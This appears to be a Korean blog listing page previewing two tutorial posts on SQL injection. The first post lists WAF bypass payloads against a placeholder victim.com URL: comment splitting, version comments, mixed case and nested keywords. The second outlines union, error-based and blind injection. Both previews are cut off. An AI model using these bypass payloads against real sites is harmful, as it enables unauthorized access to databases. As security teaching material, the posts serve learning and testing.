SQL Injection WAF 우회기법 ▶ WAF 기본 우회기법 (1) 주석처리 방법 : 1 2 3 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3..... http://victim.com/news.php?id=1+/*!union*/ /*!select*/ 1,2,3,4…. cs (2) 대소문자 교체 방법 : 1 http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... cs (3) 단어 대체 방법 : 방화벽에서 SQL 키워드를 제거하는 방식을 사용할 때 1 2 http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- (어떤 WAF는 소문자 "union"과 "select"를 제거하게 .. 2022. 11. 21. Union SQL Injection ▶ SQL Injection 항목별 적용법 SQL 질의문이 화면에 보이는 경우 : Union SQL Injection SQL 에러가 응답에 포함되는 경우 : Error based SQL Injection SQL 질의문 결과가 화면에 나오지 않는 경우 : Blind SQL Injection ※ Blind SQL injection은 속도가 느려서 모든 타입에 무작정 적용하기에는 적합하지 않다. ▶ Union 구문이란? Union : Select 문을 한번 더 쓸 수 있게 해주는 명령어 (SELECT ~~ UNION SELECT ~~) 예시) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 MariaDB [address]> SELECT * FROM m.. 2022. 11. 3. 이전 1 다음
